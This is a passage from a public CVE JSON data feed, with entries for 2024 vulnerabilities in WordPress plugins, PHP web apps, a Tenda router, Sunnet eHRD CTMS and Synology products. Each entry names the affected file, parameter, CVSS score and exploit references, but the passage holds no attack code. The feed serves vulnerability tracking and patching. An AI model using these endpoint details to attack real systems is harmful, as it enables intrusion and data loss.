"https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php", "refsource" : "", "tags" : [ "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'amppb_remove_saved_layout_data' function in all versions up to, and including, 1.0.93.1. This makes it possible for authenticated attackers, with contributor access and above, to delete arbitrary posts on the site." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ampforwp:accelerated_mobile_pages:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.0.93.2", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-02-26T15:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10430", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/23", "name" : "https://github.com/ppp-src/CVE/issues/23", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281981", "name" : "VDB-281981 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281981", "name" : "VDB-281981 | Codezips Pet Shop Management System animalsupdate.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432149", "name" : "Submit #432149 | Codezips Pet Shop Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Codezips Pet Shop Management System 1.0. This issue affects some unknown processing of the file /animalsupdate.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:pet_shop_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T23:15Z", "lastModifiedDate" : "2024-10-30T18:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10431", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/ppp-src/CVE/issues/24", "name" : "https://github.com/ppp-src/CVE/issues/24", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281982", "name" : "VDB-281982 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281982", "name" : "VDB-281982 | Codezips Pet Shop Management System deletebird.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.432150", "name" : "Submit #432150 | Codezips Pet Shop Management System In PHP With Source Code V1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Codezips Pet Shop Management System 1.0. Affected is an unknown function of the file /deletebird.php. The manipulation of the argument t1 leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:codezips:pet_shop_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-27T23:15Z", "lastModifiedDate" : "2024-10-30T18:10Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10432", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/project_worlds_simple_web_based_chat_app_index_sqli.md", "name" : "https://github.com/jadu101/CVE/blob/main/project_worlds_simple_web_based_chat_app_index_sqli.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281983", "name" : "VDB-281983 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281983", "name" : "VDB-281983 | Project Worlds Simple Web-Based Chat Application index.php sql injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432234", "name" : "Submit #432234 | Project Worlds Simple Web Based Chat Application 1.0 SQL Injection", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Project Worlds Simple Web-Based Chat Application 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:simple_web-based_chat_application:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-28T00:15Z", "lastModifiedDate" : "2024-10-30T18:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10433", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jadu101/CVE/blob/main/project_worlds_simple_web_based_chat_app_index_xss.md", "name" : "https://github.com/jadu101/CVE/blob/main/project_worlds_simple_web_based_chat_app_index_xss.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281984", "name" : "VDB-281984 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281984", "name" : "VDB-281984 | Project Worlds Simple Web-Based Chat Application index.php cross site scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.432236", "name" : "Submit #432236 | Project Worlds Simple Web Based Chat Application 1.0 Cross Site Scripting", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Project Worlds Simple Web-Based Chat Application 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument Name/Comment leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions different parameters to be affected which do not correlate with the screenshots of a successful attack." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:projectworlds:simple_web-based_chat_application:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-28T00:15Z", "lastModifiedDate" : "2024-10-30T18:31Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10434", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/physicszq/Routers/blob/main/Tenda/README.md", "name" : "https://github.com/physicszq/Routers/blob/main/Tenda/README.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.281985", "name" : "VDB-281985 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.281985", "name" : "VDB-281985 | Tenda AC1206 ate ate_Tenda_mfg_check_usb3 stack-based overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?submit.431291", "name" : "Submit #431291 | tenda tenda router AC1206 Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC1206 up to 20241027. It has been classified as critical. This affects the function ate_Tenda_mfg_check_usb/ate_Tenda_mfg_check_usb3 of the file /goform/ate. The manipulation of the argument arg leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac1206_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-10-27", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac1206:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-28T01:15Z", "lastModifiedDate" : "2024-11-01T16:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10435", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/didi/super-jacoco/issues/48", "name" : "https://github.com/didi/super-jacoco/issues/48", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?ctiid.281986", "name" : "VDB-281986 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?id.281986", "name" : "VDB-281986 | didi Super-Jacoco triggerEnvCov command injection", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.427381", "name" : "Submit #427381 | didi super-jacoco 1.0 Command Injection", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in didi Super-Jacoco 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /cov/triggerEnvCov. The manipulation of the argument uuid leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-28T01:15Z", "lastModifiedDate" : "2024-10-28T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10436", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/wpc-smart-messages/tags/4.2.1/includes/class-backend.php#L418", "name" : "https://plugins.trac.wordpress.org/browser/wpc-smart-messages/tags/4.2.1/includes/class-backend.php#L418", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3177426/wpc-smart-messages/trunk/includes/class-backend.php?contextall=1", "name" : "https://plugins.trac.wordpress.org/changeset/3177426/wpc-smart-messages/trunk/includes/class-backend.php?contextall=1", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/wpc-smart-messages/", "name" : "https://wordpress.org/plugins/wpc-smart-messages/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0fd87512-def0-4e59-aa2d-b166919474f3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0fd87512-def0-4e59-aa2d-b166919474f3?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.2.1 via the get_condition_value function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-29T10:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10437", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4acb4fda-0217-44b9-a85e-64807eb4a011?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4acb4fda-0217-44b9-a85e-64807eb4a011?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/wpc-smart-messages/tags/4.2.1/includes/class-backend.php#L775", "name" : "https://plugins.trac.wordpress.org/browser/wpc-smart-messages/tags/4.2.1/includes/class-backend.php#L775", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3177426/wpc-smart-messages/trunk/includes/class-backend.php?contextall=1", "name" : "https://plugins.trac.wordpress.org/changeset/3177426/wpc-smart-messages/trunk/includes/class-backend.php?contextall=1", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to unauthorized Smar Message activation/deactivation due to a missing capability check on the ajax_enable function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or deactivate smart messages." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-29T10:15Z", "lastModifiedDate" : "2024-10-29T14:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10438", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-288" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8165-7da2f-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8165-7da2f-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8164-fe7c5-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8164-fe7c5-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The eHRD CTMS from Sunnet has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to bypass authentication by satisfying specific conditions in order to access certain functionalities." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sun.net:ehdr_ctms:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.14", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-28T03:15Z", "lastModifiedDate" : "2024-10-31T00:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10439", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-639" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8167-a2c0d-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8167-a2c0d-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8166-085c4-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8166-085c4-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The eHRD CTMS from Sunnet has an Insecure Direct Object Reference (IDOR) vulnerability, allowing unauthenticated remote attackers to modify a specific parameter to access arbitrary files uploaded by any user." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sun.net:ehdr_ctms:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-28T03:15Z", "lastModifiedDate" : "2024-10-31T00:35Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1044", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_review' function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:cusrev:customer_reviews_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "5.39.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-07-11T20:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10440", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8169-0632f-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8169-0632f-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8168-02720-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8168-02720-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The eHDR CTMS from Sunnet has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL command to read, modify, and delete database contents." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sun.net:ehdr_ctms:*:*:*:*:*:*:*:*", "versionEndExcluding" : "10.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-28T03:15Z", "lastModifiedDate" : "2024-10-31T00:34Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10441", "ASSIGNER" : "security@synology.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_20", "name" : "Synology-SA-24:20 DSM (PWN2OWN 2024)", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_23", "name" : "Synology-SA-24:23 BeeStation (PWN2OWN 2024)", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper encoding or escaping of output vulnerability in the system plugin daemon in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allows remote attackers to execute arbitrary code via unspecified vectors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-19T02:15Z", "lastModifiedDate" : "2025-03-27T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10442", "ASSIGNER" : "security@synology.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-193" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_22", "name" : "Synology-SA-24:22 Replication Service (PWN2OWN 2024)", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Off-by-one error vulnerability in the transmission component in Synology Replication Service before 1.0.12-0066, 1.2.2-0353 and 1.3.0-0423 and Synology Unified Controller (DSMUC) before 3.1.4-23079 allows remote attackers to execute arbitrary code, potentially leading to a broader impact across the system via unspecified vectors." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-03-19T03:15Z", "lastModifiedDate" : "2025-03-19T03:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10443", "ASSIGNER" : "security@synology.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-77" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_18", "name" : "Synology-SA-24:18 BeePhotos (PWN2OWN 2024)", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.synology.com/en-global/security/advisory/Synology_SA_24_19", "name" : "Synology-SA-24:19 Synology Photos 